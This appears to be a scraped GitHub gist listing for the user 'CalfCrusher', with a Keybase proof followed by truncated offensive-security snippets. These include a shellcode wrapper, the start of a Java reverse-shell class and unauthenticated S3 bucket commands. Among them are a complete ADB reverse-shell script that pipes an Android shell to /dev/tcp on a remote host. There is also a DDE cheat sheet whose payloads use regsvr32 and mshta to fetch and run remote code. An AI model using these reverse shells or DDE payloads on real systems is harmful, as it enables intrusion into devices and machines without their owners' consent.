CalfCrusher

Keybase proof

I hereby claim:

• I am CalfCrusher on github.
• I am calfcrusher (https://keybase.io/calfcrusher) on keybase.
• I have a public key whose fingerprint is AED3 14DE 02E0 1CDD 47FA 149D 807E 485C 9B9B D04E

To claim this, I am signing this object:

CalfCrusher

#!/usr/bin/env python3

import argparse
import datetime
from functools import wraps
import socket
from ssl import wrap_socket, create_default_context, CERT_NONE
import sys
import subprocess
import tempfile

CalfCrusher

/*
Deamonized ShellCode Wrapper
To compile:
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>

CalfCrusher

import sys
import os
import argparse
import getpass
import logging

logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger('upload_bom')

if __name__ == '__main__':

CalfCrusher

'''
SimpleSecureHTTPServer.py - simple HTTP server supporting SSL.

- replace fpem with the location of your .pem server file.
- the default port is 443.

usage: python SimpleSecureHTTPServer.py

Credit: https://code.activestate.com/recipes/442473-simple-http-server-supporting-ssl-secure-communica/
License: PSF License

CalfCrusher

#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie 
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"

CalfCrusher

// Not sure where I originally got this from. 
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class C {

  public C() throws Exception {
    String host="10.0.0.90";

CalfCrusher

Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet

• Using regsvr32 *.sct files technique:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"

• Using HTA files technique:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"

CalfCrusher

#!/usr/bin/python

import sys
import getopt
import urllib2
from optparse import OptionParser

def main():
  # variables
  btcaddr = ""

CalfCrusher

aws s3 ls s3://s3buckethere --no-sign-request                                                       ## Lists the file in the s3 bucket
aws s3 cp s3://bucketname/filethere.txt . --no-sign-request                                         ## Downloads `filethere.txt` from the s3 bucket in the current directory
aws s3 cp test.txt s3://bucketname --no-sign-request                                                ## Uploads `test.txt` from current directory to the s3 bucket
aws s3api get-bucket-acl --bucket bucketname --no-sign-request                                      ## Shows ACL (Access Control List) of the given bucket
aws s3api get-object-acl --bucket bucketname --key fileons3bucket.ext --no-sign-request             ## Shows ACL (Access Control List) of given object in the bucket